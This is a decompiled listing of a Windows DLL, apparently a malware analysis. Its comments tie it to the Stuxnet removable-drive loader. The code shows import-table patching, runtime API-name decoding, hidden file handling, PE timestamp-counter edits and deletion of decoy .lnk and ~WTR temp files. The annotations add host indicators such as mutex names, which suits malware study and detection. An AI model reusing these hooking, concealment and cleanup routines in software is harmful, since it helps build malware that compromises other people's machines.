a1; LABEL_12: result = 1; } return result; } //----- (10001B20) -------------------------------------------------------- signed int __userpurge sub_10001B20(int a1, DWORD lpString1, LPCSTR lpString2, int a4) { DWORD v4; // ebx@1 void *v5; // esp@1 HANDLE v6; // eax@1 signed int result; // eax@2 char v8; // [sp-Ch] [bp-1234h]@1 HMODULE lp; // [sp+0h] [bp-1228h]@1 WCHAR Filename; // [sp+1000h] [bp-228h]@5 DWORD v11; // [sp+1208h] [bp-20h]@4 DWORD cbNeeded; // [sp+120Ch] [bp-1Ch]@1 char *v13; // [sp+1210h] [bp-18h]@1 int v14; // [sp+1218h] [bp-10h]@1 signed int (__usercall *v15)(int); // [sp+121Ch] [bp-Ch]@1 _UNKNOWN *v16; // [sp+1220h] [bp-8h]@1 int v17; // 
[sp+1224h] [bp-4h]@1 v17 = -1; v16 = &unk_100055E8; v15 = sub_100028A8; v14 = a1; v5 = alloca(4624); v13 = &v8; v4 = 0; cbNeeded = 0; v6 = GetCurrentProcess(); if ( EnumProcessModules(v6, &lp, 0x1000u, &cbNeeded) >= 0 ) { cbNeeded >>= 2; while ( 1 ) { v11 = v4; if ( v4 >= cbNeeded ) break; v17 = 0; if ( !GetModuleFileNameW(*(&lp + v4), &Filename, 0x104u) || IsBadReadPtr(*(&lp + v4), 0x40u) || sub_10001F80(&Filename) ) { v17 = -1; ++v4; } else { sub_10001C40(lpString1, (int)*(&lp + v4), (LPCSTR)lpString1, lpString2, a4); v17 = -1; ++v4; } } result = 1; } else { result = 0; } return result; } //----- (10001C40) -------------------------------------------------------- signed int __userpurge sub_10001C40(DWORD a1, int a2, LPCSTR lpString1, LPCSTR lpString2, int a5) { int v6; // ebp@3 int v7; // edx@5 int v8; // ebp@5 const CHAR *v9; // edx@6 int v10; // ecx@6 int v11; // ebx@6 void *v12; // esi@6 char v13; // sf@9 int v14; // eax@9 DWORD flOldProtect; // [sp+0h] [bp-4h]@1 flOldProtect = a1; if ( *(_WORD *)a2 != 23117 ) return 0; v6 = *(_DWORD *)(*(_DWORD *)(a2 + 60) + a2 + 128); if ( !v6 ) return 0; v7 = *(_DWORD *)(v6 + 12 + a2); v8 = a2 + v6; if ( !v7 ) return 1; while ( 1 ) { v10 = *(_DWORD *)(v8 + 16); v9 = (const CHAR *)(a2 + v7); v12 = (void *)(v10 + a2); v11 = *(_DWORD *)v8 + a2; if ( *(_DWORD *)v8 ) { if ( v10 ) { if ( !lstrcmpiA(lpString1, v9) ) { v14 = *(_DWORD *)v11; v13 = *(_DWORD *)v11 < 0; if ( *(_DWORD *)v11 ) break; } } } LABEL_15: v7 = *(_DWORD *)(v8 + 32); v8 += 20; if ( !v7 ) return 1; } while ( 1 ) { if ( v13 || lstrcmpA((LPCSTR)(v14 + a2 + 2), lpString2) ) goto LABEL_14; if ( !VirtualProtect(v12, 4u, 0x80u, &flOldProtect) ) return 0; *(_DWORD *)v12 = a5; LABEL_14: v14 = *(_DWORD *)(v11 + 4); v11 += 4; v12 = (char *)v12 + 4; v13 = v14 < 0; if ( !v14 ) goto LABEL_15; } } //----- (10001D00) -------------------------------------------------------- WCHAR *__usercall sub_10001D00(const WCHAR *a1) { WCHAR *result; // eax@1 int v2; // ebx@1 DWORD v3; // 
ecx@2 void *v4; // esi@3 LPVOID lpAddress; // [sp+Ch] [bp-214h]@2 int v6; // [sp+10h] [bp-210h]@2 int v7; // [sp+14h] [bp-20Ch]@3 WCHAR String[260]; // [sp+18h] [bp-208h]@1 lstrcpynW(String, a1, 260); v2 = lstrlenW(L"~WTR4132.tmp"); result = &String[lstrlenW(String) - v2]; if ( result ) { lstrcpynW(result, L"~WTR4132.tmp", 260); result = (WCHAR *)sub_10001D90(String, v3, &lpAddress, (DWORD *)&v6); if ( result ) { v4 = lpAddress; sub_100034D2(0, lpAddress, v6, (int)&v7); result = (WCHAR *)VirtualFree(v4, 0, 0x8000u); } } return result; } // 10001D00: using guessed type WCHAR String[260]; //----- (10001D90) -------------------------------------------------------- signed int __usercall sub_10001D90(const WCHAR *a1, DWORD a2, LPVOID *a3, DWORD *a4) { HANDLE v4; // eax@1 void *v5; // esi@1 void *v6; // eax@2 DWORD v7; // eax@2 DWORD NumberOfBytesRead; // [sp+0h] [bp-4h]@1 NumberOfBytesRead = a2; v4 = CreateFileW(a1, 0x80000000u, 1u, 0, 3u, 0, 0); v5 = v4; if ( v4 != (HANDLE)-1 ) { v7 = GetFileSize(v4, 0); *a4 = v7; v6 = VirtualAlloc(0, v7, 0x3000u, 4u); *a3 = v6; if ( !v6 ) { CloseHandle(v5); return 0; } if ( ReadFile(v5, v6, *a4, &NumberOfBytesRead, 0) && NumberOfBytesRead == *a4 ) { CloseHandle(v5); return 1; } VirtualFree(*a3, 0, 0x8000u); } return 0; } //----- (10001E20) -------------------------------------------------------- BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { int v3; // eax@1 BOOL result; // eax@3 char v5; // [sp-Ch] [bp-24h]@1 char *v6; // [sp+0h] [bp-18h]@1 int v7; // [sp+8h] [bp-10h]@1 signed int (__usercall *v8)(int); // [sp+Ch] [bp-Ch]@1 _UNKNOWN *v9; // [sp+10h] [bp-8h]@1 int v10; // [sp+14h] [bp-4h]@1 v9 = &unk_100055D8; v8 = sub_100028A8; v7 = v3; v6 = &v5; v10 = 0; if ( fdwReason && fdwReason == 1 ) { hModule = hinstDLL; DisableThreadLibraryCalls(hinstDLL); result = sub_10001ED0(); v10 = -1; } else { result = 1; } return result; } //----- (10001EA7) 
-------------------------------------------------------- signed int __cdecl sub_10001EA7() { return 1; } //----- (10001EAD) -------------------------------------------------------- int __userpurge sub_10001EAD(int a1, int a2, int a3, int a4) { *(_DWORD *)(a1 - 4) = -1; return 0; } // 10001EAD: could not find valid save-restore pair for ebx // 10001EAD: could not find valid save-restore pair for edi // 10001EAD: could not find valid save-restore pair for esi //----- (10001ED0) -------------------------------------------------------- DWORD __cdecl sub_10001ED0() { DWORD result; // eax@1 HANDLE v1; // esi@5 bool v2; // edi@6 FARPROC v3; // eax@7 HMODULE hLibModule; // [sp+0h] [bp-20Ch]@6 WCHAR FileName; // [sp+4h] [bp-208h]@1 result = GetModuleFileNameW(hModule, &FileName, 0x104u); if ( result ) { if ( sub_10001F80(&FileName) ) return 1; v1 = sub_100020A0(); if ( v1 ) { v2 = sub_10001FD0(&FileName, (int)&hLibModule); ReleaseMutex(v1); CloseHandle(v1); if ( v2 ) { v3 = GetProcAddress(hLibModule, (LPCSTR)1); if ( !v3 ) { FreeLibrary(hLibModule); return 0; } ((void (__cdecl *)(_DWORD, _DWORD))v3)(&FileName, 0); } } result = 0; } return result; } //----- (10001F80) -------------------------------------------------------- signed int __usercall sub_10001F80(const WCHAR *a1) { int i; // eax@1 int v2; // edi@1 int v3; // eax@4 signed __int16 v4; // cx@4 v2 = (int)L"SHELL32.DLL.ASLR."; for ( i = (int)&a1[lstrlenW(a1) - 1]; i >= (unsigned int)a1; i -= 2 ) { if ( *(_WORD *)i == 92 ) break; } v3 = i + 2; v4 = 83; while ( v4 == *(_WORD *)v3 ) { v4 = *(_WORD *)(v2 + 2); v2 += 2; v3 += 2; if ( !v4 ) return 1; } return 0; } // 100054C4: using guessed type wchar_t aShell32_dll_as[18]; //----- (10001FD0) -------------------------------------------------------- bool __stdcall sub_10001FD0(LPCWSTR lpFileName, int a2) { UINT v2; // edi@1 int v3; // ebx@1 bool result; // eax@2 DWORD v5; // edi@3 DWORD v6; // eax@3 int v7; // esi@3 const void *hObject; // [sp+Ch] [bp-210h]@1 int v9; // 
[sp+10h] [bp-20Ch]@1
  WCHAR String2; // [sp+14h] [bp-208h]@3

  // 32775 = 0x8007: SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX |
  // SEM_NOALIGNMENTFAULTEXCEPT | SEM_NOOPENFILEERRORBOX, i.e. no error dialogs
  // while the file is read. The previous mode is restored right after.
  v2 = SetErrorMode(32775u);
  v3 = sub_100035ED(lpFileName, &hObject, (int)&v9);
  SetErrorMode(v2);
  if ( v3 )
  {
    v5 = GetTickCount() / 7;
    v6 = GetTickCount();
    // Name is the fixed prefix plus a tick-count-derived hex suffix.
    wsprintfW(&String2, L"%s%08x", L"SHELL32.DLL.ASLR.", v5 + 7 * v6);
    v7 = sub_100034D2(&String2, hObject, v9, a2);
    // The file buffer is released whether or not the call succeeded.
    sub_1000368F((LPVOID)hObject);
    result = v7 == 0;
  }
  else
  {
    result = 0;
  }
  return result;
}
// 100054C4: using guessed type wchar_t aShell32_dll_as[18];

//----- (100020A0) --------------------------------------------------------
// Creates (and initially owns) a mutex whose name is built from the current
// process id XORed with four constants, formatted "{%08x-%08x-%08x-%08x}".
// If the mutex already existed (GetLastError() == 183, ERROR_ALREADY_EXISTS)
// it waits up to 0x1388 ms (5 s); a non-zero wait result closes the handle
// and returns 0. Returns the mutex handle otherwise, 0 if creation failed.
// Analyst note: the name is deterministic per PID, so it can be recomputed
// for a given process when hunting for this mutex.
HANDLE __cdecl sub_100020A0()
{
  HANDLE v0; // esi@1
  DWORD v1; // eax@1
  WCHAR Name; // [sp+4h] [bp-84h]@1

  v1 = GetCurrentProcessId();
  wsprintfW(&Name, L"{%08x-%08x-%08x-%08x}", v1 ^ 0x5858AA3, v1 ^ 0xAE48481, v1 ^ 0x5858721, v1 ^ 0x49481);
  v0 = CreateMutexW(0, 1, &Name);
  if ( !v0 )
    return 0;
  if ( GetLastError() == 183 && WaitForSingleObject(v0, 0x1388u) )
  {
    CloseHandle(v0);
    return 0;
  }
  return v0;
}

//----- (10002130) --------------------------------------------------------
// Same logic as sub_100020A0 with a different set of XOR constants, so it
// yields a second, distinct per-process mutex name.
HANDLE __cdecl sub_10002130()
{
  HANDLE v0; // esi@1
  DWORD v1; // eax@1
  WCHAR Name; // [sp+4h] [bp-84h]@1

  v1 = GetCurrentProcessId();
  wsprintfW(&Name, L"{%08x-%08x-%08x-%08x}", v1 ^ 0x9487481, v1 ^ 0x40941, v1 ^ 0x5800097, v1 ^ 0x4393481);
  v0 = CreateMutexW(0, 1, &Name);
  if ( !v0 )
    return 0;
  // 183 = ERROR_ALREADY_EXISTS; 0x1388 ms = 5 s wait for the current owner.
  if ( GetLastError() == 183 && WaitForSingleObject(v0, 0x1388u) )
  {
    CloseHandle(v0);
    return 0;
  }
  return v0;
}

//----- (100021C0) --------------------------------------------------------
// Exported under the standard COM name but not used as a class factory: the
// first argument is treated as a wide-character string (a file path, judging
// by how sub_10002340 uses it), copied to the process heap, and then either
// processed synchronously (riid non-zero) or handed to a new thread running
// StartAddress. Returns 1 on success and 0 on failure rather than an HRESULT.
// The decompiler flags the prototype as inconsistent (see the trailing note),
// so the declared parameter types should not be trusted.
HRESULT __stdcall DllGetClassObject(const IID *const rclsid, const IID *const riid, LPVOID *ppv)
{
  WCHAR *v3; // eax@1
  const WCHAR *v4; // esi@1
  int v5; // eax@1
  SIZE_T v6; // ST14_4@1
  HANDLE v7; // eax@1
  int v8; // eax@2
  HRESULT result; // eax@3
  HANDLE v10; // eax@4
  char v11; // [sp-Ch] [bp-24h]@1
  char *v12; // [sp+0h] [bp-18h]@1
  int v13; // [sp+8h] [bp-10h]@1
  signed int (__usercall *v14)(int); // [sp+Ch] [bp-Ch]@1
  _UNKNOWN *v15; // [sp+10h] [bp-8h]@1
  int v16; // [sp+14h] [bp-4h]@1

  v15
= &unk_10005618;
  v14 = sub_100028A8;
  v13 = v5;
  v12 = &v11;
  v16 = 0;
  // Heap copy of the string passed as the first argument: (length + 1) WCHARs,
  // zero-filled (flag 8 = HEAP_ZERO_MEMORY).
  // NOTE(review): no visible code frees this copy.
  v6 = 2 * lstrlenW((LPCWSTR)rclsid) + 2;
  v7 = GetProcessHeap();
  v3 = (WCHAR *)HeapAlloc(v7, 8u, v6);
  v4 = v3;
  if ( !v3 )
    goto LABEL_9;
  v8 = (int)lstrcpyW(v3, (LPCWSTR)rclsid);
  if ( riid )
  {
    // Second argument non-zero: do the work on the calling thread.
    sub_10002340(v4, v8);
    v16 = -1;
    return 1;
  }
  // Otherwise defer the work to a background thread.
  v10 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartAddress, (LPVOID)v4, 0, 0);
  if ( v10 )
  {
    CloseHandle(v10);
    v16 = -1;
    result = 1;
  }
  else
  {
LABEL_9:
    result = 0;
  }
  return result;
}
// 100021C0: inconsistent function type and number of purged bytes

//----- (100022B0) --------------------------------------------------------
// Thread routine started by DllGetClassObject. Under the mutex from
// sub_10002130 it runs sub_10001430 (not visible in this listing), then
// sleeps 0x2710 ms (10 s) and calls sub_10002340 on the path it was given.
// v4 is passed uninitialised; together with the a1 parameter this looks like a
// decompiler artifact of the exception-frame set-up -- TODO confirm.
int __userpurge StartAddress(int a1, LPCWSTR lpFileName)
{
  HANDLE v2; // esi@1
  int v4; // eax@3
  char v5; // [sp-Ch] [bp-24h]@1
  char *v6; // [sp+0h] [bp-18h]@1
  int v7; // [sp+8h] [bp-10h]@1
  signed int (__usercall *v8)(int); // [sp+Ch] [bp-Ch]@1
  _UNKNOWN *v9; // [sp+10h] [bp-8h]@1
  int v10; // [sp+14h] [bp-4h]@1

  v9 = &unk_10005608;
  v8 = sub_100028A8;
  v7 = a1;
  v6 = &v5;
  v10 = 0;
  v2 = sub_10002130();
  if ( v2 )
  {
    sub_10001430();
    ReleaseMutex(v2);
    CloseHandle(v2);
  }
  Sleep(0x2710u);
  sub_10002340(lpFileName, v4);
  return 0;
}

//----- (10002340) --------------------------------------------------------
// Runs the file-handling steps at most once per mutex lifetime: it creates the
// fixed-name mutex "{BE3533AB-2DDC-46a1-8F7B-F102B8A5C30A}" and, only when the
// mutex did not exist before (GetLastError() != 183), calls sub_10001D00 and
// sub_100023D0 on lpFileName.
// Analyst note: the mutex name is a constant, which makes it a stable host
// indicator. On the working path the handle v3 is not closed here.
void __usercall sub_10002340(LPCWSTR lpFileName, int a2)
{
  const WCHAR *v2; // edi@1
  HANDLE v3; // esi@1
  char v4; // [sp-Ch] [bp-24h]@1
  char *v5; // [sp+0h] [bp-18h]@1
  int v6; // [sp+8h] [bp-10h]@1
  signed int (__usercall *v7)(int); // [sp+Ch] [bp-Ch]@1
  _UNKNOWN *v8; // [sp+10h] [bp-8h]@1
  int v9; // [sp+14h] [bp-4h]@1

  v8 = &unk_100055F8;
  v7 = sub_100028A8;
  v6 = a2;
  v5 = &v4;
  v2 = lpFileName;
  v9 = 0;
  v3 = CreateMutexW(0, 1, L"{BE3533AB-2DDC-46a1-8F7B-F102B8A5C30A}");
  if ( v3 )
  {
    if ( GetLastError() == 183 )
    {
      // Another instance already holds the mutex: do nothing.
      CloseHandle(v3);
    }
    else
    {
      sub_10001D00(v2);
      sub_100023D0(v2);
    }
  }
}

//----- (100023D0) --------------------------------------------------------
// Updates the file lpFileName in place and then hides it:
//  - opens it read/write (sub_10002460, with retries),
//  - lets sub_100024F0 decrement a one-byte counter stored in its PE header,
//  - if the original attributes were read, passes three fields of that
//    attribute block plus the handle to sub_10001000 (not visible here;
//    presumably restores the file times -- TODO confirm),
//  - sets the hidden attribute (2 = FILE_ATTRIBUTE_HIDDEN).
// When the file cannot be opened or the counter update fails, it calls
// sub_100025B0, which deletes a fixed set of files from the same directory.
void __stdcall sub_100023D0(LPCWSTR lpFileName)
{
  const WCHAR *v1; // edi@1
  bool v2; // ebp@2
  HANDLE v3; // esi@2
HANDLE hObject; // [sp+8h] [bp-2Ch]@1
  int v5; // [sp+Ch] [bp-28h]@1
  char FileInformation; // [sp+10h] [bp-24h]@1
  char v7; // [sp+14h] [bp-20h]@3
  char v8; // [sp+1Ch] [bp-18h]@3
  char v9; // [sp+24h] [bp-10h]@3

  v1 = lpFileName;
  hObject = (HANDLE)-1;
  // Capture the attribute block before the file is modified. v7/v8/v9 sit at
  // offsets +4, +0xC and +0x14 from FileInformation, which is where
  // WIN32_FILE_ATTRIBUTE_DATA keeps creation, last-access and last-write time.
  v5 = GetFileAttributesExW(lpFileName, 0, &FileInformation);
  if ( !sub_10002460((int)&hObject, lpFileName) )
    goto LABEL_8;
  v3 = hObject;
  // v2 is true when the counter update failed.
  v2 = sub_100024F0(hObject) == 0;
  if ( v5 )
  {
    sub_10001000((int)&v7, (int)&v8, (int)&v9, v3);
    v1 = lpFileName;
    v3 = hObject;
  }
  CloseHandle(v3);
  SetFileAttributesW(v1, 2u);
  if ( v2 )
LABEL_8:
    sub_100025B0(v1);
}

//----- (10002460) --------------------------------------------------------
// Opens lpFileName for read/write (0xC0000000 = GENERIC_READ | GENERIC_WRITE,
// share 3 = read | write, 3 = OPEN_EXISTING), retrying up to 8 times with a
// 0xBB8 ms (3 s) pause between attempts. The handle of the last attempt is
// stored at *a1. Returns true when an attempt succeeded.
bool __userpurge sub_10002460(int a1, LPCWSTR lpFileName)
{
  signed int v2; // esi@1
  HANDLE v3; // eax@2

  v2 = 0;
  do
  {
    v3 = CreateFileW(lpFileName, 0xC0000000u, 3u, 0, 3u, 0, 0);
    *(_DWORD *)a1 = v3;
    if ( v3 != (HANDLE)-1 )
      break;
    Sleep(0xBB8u);
    ++v2;
  }
  while ( v2 < 8 );
  // v2 reaches 8 only when every attempt failed.
  return v2 != 8;
}

//----- (100024B0) --------------------------------------------------------
// Rewinds file a3 to offset 0 and writes a2 bytes from a4. Returns true only
// when the seek returned 0 and exactly a2 bytes were written. a1 merely seeds
// NumberOfBytesWritten.
bool __userpurge sub_100024B0(DWORD a1, DWORD a2, void *a3, const void *a4)
{
  DWORD NumberOfBytesWritten; // [sp+0h] [bp-4h]@1

  NumberOfBytesWritten = a1;
  return !SetFilePointer(a3, 0, 0, 0) && WriteFile(a3, a4, a2, &NumberOfBytesWritten, 0) && a2 == NumberOfBytesWritten;
}

//----- (100024F0) --------------------------------------------------------
// Reads up to 0x1000 bytes from the start of the file handle `this`, checks
// for an 'MZ' DOS header (23117 = 0x5A4D) and a 'PE\0\0' signature (17744 =
// 0x4550) at the offset stored at Buffer+0x3C (v9), and then treats the low
// byte of the dword at signature+8 -- the TimeDateStamp field of a standard PE
// file header -- as a counter. The byte is saved in dword_10006020; when it is
// in the range 2..0x7F the dword is decremented and the buffer is written back
// to the file via sub_100024B0. Returns true only when that write succeeded.
// Analyst note: a PE whose timestamp low byte changes between observations of
// the same file is consistent with this routine having run.
// NOTE(review): v9 is a signed value taken from the file; only the upper bound
// (v9 + 248 <= bytes read) is checked before it is used as an offset.
bool __thiscall sub_100024F0(void *this)
{
  void *v1; // esi@1
  DWORD v2; // edi@3
  DWORD v3; // ecx@7
  unsigned int v4; // eax@8
  int v5; // edx@8
  bool result; // eax@11
  DWORD NumberOfBytesRead; // [sp+8h] [bp-1004h]@2
  int Buffer; // [sp+Ch] [bp-1000h]@2
  int v9; // [sp+48h] [bp-FC4h]@6

  v1 = this;
  if ( !SetFilePointer(this, 0, 0, 0)
    && ReadFile(v1, &Buffer, 0x1000u, &NumberOfBytesRead, 0)
    && (v2 = NumberOfBytesRead, NumberOfBytesRead)
    && NumberOfBytesRead >= 0x40
    && (_WORD)Buffer == 23117
    && NumberOfBytesRead >= v9 + 248
    && (v3 = (DWORD)((char *)&Buffer + v9), *(int *)((char *)&Buffer + v9) == 17744)
    && (v5 =
*(_DWORD *)(v3 + 8),
        v4 = (unsigned __int8)*(_DWORD *)(v3 + 8),
        dword_10006020 = v4,
        v4 != 1)
    && v4
    && v4 <= 0x7F )
  {
    // Counter byte is in 2..0x7F: decrement the dword and write the buffer back.
    *(_DWORD *)(v3 + 8) = v5 - 1;
    result = sub_100024B0(v3, v2, v1, &Buffer) != 0;
  }
  else
  {
    result = 0;
  }
  return result;
}
// 10006020: using guessed type int dword_10006020;

//----- (100025B0) --------------------------------------------------------
// Clean-up routine: deletes a fixed set of files from the directory that
// contains a1. The directory part of a1 is kept in FileName and these names
// are appended in turn:
//   <word_10005428> + N x "Copy of " + "Copy of Shortcut to.lnk"
//       (the loop appears to run for N = 0..3; word_10005428 is not visible here)
//   "~WTR4132.tmp"
//   "~WTR4141.tmp"
// For each name the attributes are reset to 0x80 (FILE_ATTRIBUTE_NORMAL) and
// DeleteFileW is retried up to 8 times, 0x1F4 ms (500 ms) apart, stopping
// early when the delete succeeds or the file no longer exists.
// NOTE(review): these file names match publicly documented indicators of the
// Stuxnet removable-drive loader; confirm against the sample hash before
// attributing.
// NOTE(review): lstrcpyW/lstrcatW into the 260-element FileName buffer are
// unbounded.
void __usercall sub_100025B0(const WCHAR *a1)
{
  int i; // eax@1
  const WCHAR *v2; // esi@1
  WCHAR *v3; // edi@4
  int v4; // esi@4
  signed int v5; // esi@8
  unsigned __int8 v6; // sf@12
  unsigned __int8 v7; // of@12
  signed int v8; // esi@13
  signed int v9; // esi@17
  int j; // [sp+10h] [bp-20Ch]@4
  WCHAR FileName[260]; // [sp+14h] [bp-208h]@1

  v2 = a1;
  lstrcpyW(FileName, a1);
  // Find the last backslash (92); v3 then points just past it.
  for ( i = lstrlenW(v2) - 1; i >= 0; --i )
  {
    if ( FileName[i] == 92 )
      break;
  }
  v3 = &FileName[i + 1];
  v4 = 0;
  *v3 = 0;
  for ( j = 0; ; v4 = j )
  {
    lstrcpyW(v3, &word_10005428);
    if ( v4 > 0 )
    {
      do
      {
        lstrcatW(v3, L"Copy of ");
        --v4;
      }
      while ( v4 );
    }
    lstrcatW(v3, L"Copy of Shortcut to.lnk");
    v5 = 0;
    do
    {
      SetFileAttributesW(FileName, 0x80u);
      if ( DeleteFileW(FileName) )
        break;
      // -1 = INVALID_FILE_ATTRIBUTES: nothing left to delete.
      if ( GetFileAttributesW(FileName) == -1 )
        break;
      Sleep(0x1F4u);
      ++v5;
    }
    while ( v5 < 8 );
    // Decompiled flag arithmetic for a signed "j < 3" test on the pre-increment
    // value of j.
    v7 = __SETO__(j + 1, 4);
    v6 = j++ - 3 < 0;
    if ( !(v6 ^ v7) )
      break;
  }
  lstrcpyW(v3, L"~WTR4132.tmp");
  v8 = 0;
  do
  {
    SetFileAttributesW(FileName, 128u);
    if ( DeleteFileW(FileName) )
      break;
    if ( GetFileAttributesW(FileName) == -1 )
      break;
    Sleep(0x1F4u);
    ++v8;
  }
  while ( v8 < 8 );
  lstrcpyW(v3, L"~WTR4141.tmp");
  v9 = 0;
  do
  {
    SetFileAttributesW(FileName, 0x80u);
    if ( DeleteFileW(FileName) )
      break;
    if ( GetFileAttributesW(FileName) == -1 )
      break;
    Sleep(0x1F4u);
    ++v9;
  }
  while ( v9 < 8 );
}
// 100025B0: using guessed type WCHAR FileName[260];

//----- (100027B0) --------------------------------------------------------
// Thin wrapper: RtlUnwind to frame a1 with loc_100027C8 as the return target.
int __cdecl sub_100027B0(int a1)
{
  return RtlUnwind(a1, loc_100027C8, 0, 0);
}
// 100027C8: using guessed type int __cdecl loc_100027C8(int);
// 10003C7E: using guessed type int __stdcall
RtlUnwind(_DWORD, _DWORD, _DWORD, _DWORD); //----- (100027D0) -------------------------------------------------------- signed int __cdecl sub_100027D0(int a1, int a2, int a3, int a4) { signed int result; // eax@1 result = 1; if ( *(_DWORD *)(a1 + 4) & 6 ) { *(_DWORD *)a4 = a2; result = 3; } return result; } //----- (100027F2) -------------------------------------------------------- int __usercall sub_100027F2(int a1, int a2, int a3) { int result; // eax@1 int v4; // ebx@1 int v5; // esi@1 int v6; // esi@3 while ( 1 ) { result = a2; v4 = *(_DWORD *)(a2 + 8); v5 = *(_DWORD *)(a2 + 12); if ( v5 == -1 ) break; if ( v5 == a3 ) break; v6 = 3 * v5; *(_DWORD *)(a2 + 12) = *(_DWORD *)(v4 + 4 * v6); if ( !*(_DWORD *)(v4 + 4 * v6 + 4) ) { sub_10002886(*(_DWORD *)(v4 + 4 * v6 + 8), a1, 257); (*(void (**)(void))(v4 + 4 * v6 + 8))(); } } return result; } //----- (10002886) -------------------------------------------------------- int __userpurge sub_10002886(int result, int a2, int a3) { dword_10006000[2] = *(_DWORD *)(a2 + 8); dword_10006000[1] = result; dword_10006000[3] = a2; return result; } //----- (100028A8) -------------------------------------------------------- signed int __usercall sub_100028A8(int a1) { int v1; // eax@1 int v2; // ebx@1 int v3; // edi@2 int v4; // esi@2 int v5; // eax@5 int v6; // edi@7 int v7; // ecx@7 signed int result; // eax@9 int v9; // [sp-8h] [bp-20h]@5 v2 = *(_DWORD *)(a1 + 12); v1 = *(_DWORD *)(a1 + 8); if ( *(_DWORD *)(v1 + 4) & 6 ) { sub_100027F2(v2 + 16, v2, -1); result = 1; } else { *(_DWORD *)(a1 - 8) = v1; *(_DWORD *)(a1 - 4) = *(_DWORD *)(a1 + 16); *(_DWORD *)(v2 - 4) = a1 - 8; v4 = *(_DWORD *)(v2 + 12); v3 = *(_DWORD *)(v2 + 8); while ( v4 != -1 ) { if ( *(_DWORD *)(v3 + 12 * v4 + 4) ) { v9 = a1; v5 = (*(int (__thiscall **)(int))(v3 + 12 * v4 + 4))(3 * v4); a1 = v9; v2 = *(_DWORD *)(v9 + 12); if ( v5 ) { if ( v5 < 0 ) return 0; v6 = *(_DWORD *)(v2 + 8); sub_100027B0(*(_DWORD *)(v9 + 12)); a1 = v2 + 16; sub_100027F2(v2 + 16, v2, v4); 
sub_10002886(*(_DWORD *)(v6 + 12 * v4 + 8), v2 + 16, 1);
          *(_DWORD *)(v2 + 12) = *(_DWORD *)(v6 + 4 * v7);
          // NOTE(review): v7 is never assigned in the decompiled output; the
          // index used here comes from a register the decompiler did not track.
          (*(void (**)(void))(v6 + 4 * v7 + 8))();
        }
      }
      // Advance to the enclosing scope: first dword of the current entry.
      v3 = *(_DWORD *)(v2 + 8);
      v4 = *(_DWORD *)(v3 + 12 * v4);
    }
    result = 1;
  }
  return result;
}

//----- (10002D70) --------------------------------------------------------
// Fills a3 bytes at a1 with the byte a2 and returns a1. For 4 bytes or more it
// first writes single bytes up to a 4-byte boundary, then fills whole dwords
// with the byte replicated four times (16843009 = 0x01010101), then the
// remaining tail bytes.
// NOTE(review): the inner memset call is how the decompiler renders the dword
// fill; the routine itself looks like a compiler-supplied memset -- TODO
// confirm.
void *__cdecl sub_10002D70(void *a1, unsigned __int8 a2, unsigned int a3)
{
  int v3; // edx@1
  int v4; // eax@2
  void *v5; // edi@2
  int v6; // ecx@3
  unsigned int v7; // ecx@6
  unsigned int v8; // ecx@6
  void *result; // eax@9

  v3 = a3;
  if ( a3 )
  {
    LOBYTE(v4) = a2;
    v5 = a1;
    if ( a3 < 4 )
      goto LABEL_13;
    // Bytes needed to reach the next 4-byte boundary.
    v6 = -(signed int)a1 & 3;
    if ( v6 )
    {
      v3 = a3 - v6;
      do
      {
        *(_BYTE *)v5 = a2;
        v5 = (char *)v5 + 1;
        --v6;
      }
      while ( v6 );
    }
    v4 = 16843009 * a2;
    v8 = v3;
    v3 &= 3u;
    v7 = v8 >> 2;
    if ( !v7 || (memset(v5, v4, 4 * v7), v5 = (char *)v5 + 4 * v7, v3) )
    {
LABEL_13:
      do
      {
        *(_BYTE *)v5 = v4;
        v5 = (char *)v5 + 1;
        --v3;
      }
      while ( v3 );
    }
    result = a1;
  }
  else
  {
    result = a1;
  }
  return result;
}

//----- (10002DD4) --------------------------------------------------------
// Fills the 0x44-byte pointer table that starts at dword_10003C3A. The table
// lies inside this module's own image, so the page protection is first changed
// to 0x80 (PAGE_EXECUTE_WRITECOPY) or, failing that, 0x40
// (PAGE_EXECUTE_READWRITE). Slot 0 receives the module handle from
// sub_10003708; every other slot receives an address resolved at run time by
// sub_10003788 / sub_10003799 from an encoded name blob (unk_1000xxxx).
// Returns 1 on success, 0 when neither VirtualProtect call succeeded.
// Analyst note: because names are decoded only at run time, these APIs do not
// appear in the import table or as plain strings in the file.
// NOTE(review): the resolved addresses are not checked for NULL.
signed int __thiscall sub_10002DD4(DWORD this)
{
  signed int result; // eax@3
  DWORD flOldProtect; // [sp+0h] [bp-4h]@1

  flOldProtect = this;
  if ( VirtualProtect(&dword_10003C3A, 0x44u, 0x80u, &flOldProtect)
    || VirtualProtect(&dword_10003C3A, 0x44u, 0x40u, &flOldProtect) )
  {
    dword_10003C3A = (int)sub_10003708();
    dword_10003C42 = (int)sub_10003788((int)&unk_10005110);
    dword_10003C46 = (int)sub_10003788((int)&unk_10005124);
    dword_10003C4A = (int)sub_10003788((int)&unk_10005140);
    dword_10003C4E = (int)sub_10003788((int)&unk_10005160);
    dword_10003C52 = (int)sub_10003788((int)&unk_10005180);
    dword_10003C56 = (int (__stdcall *)(_DWORD))sub_10003788((int)&unk_1000519C);
    dword_10003C5A = (int)sub_10003788((int)&unk_100051BC);
    dword_10003C5E = (int)sub_10003788((int)&unk_100051E8);
    dword_10003C62 = (int)sub_10003788((int)&unk_10005204);
    dword_10003C66 = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD,
_DWORD))sub_10003799((int)&unk_1000521C);
    // The slots filled through sub_10003799 (0x10003C66, 0x10003C6A,
    // 0x10003C7A) come from the module named by unk_10005344; the others come
    // from the module named by unk_10005328.
    dword_10003C6A = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))sub_10003799((int)&unk_1000523C);
    dword_10003C6E = (int)sub_10003788((int)&unk_10005264);
    dword_10003C72 = (int)sub_10003788((int)&unk_10005280);
    dword_10003C76 = (int)sub_10003788((int)&unk_100052A8);
    dword_10003C7A = (int (__stdcall *)(_DWORD))sub_10003799((int)&unk_100052CC);
    result = 1;
  }
  else
  {
    result = 0;
  }
  return result;
}
// 10003C3A: using guessed type int dword_10003C3A;
// 10003C42: using guessed type int dword_10003C42;
// 10003C46: using guessed type int dword_10003C46;
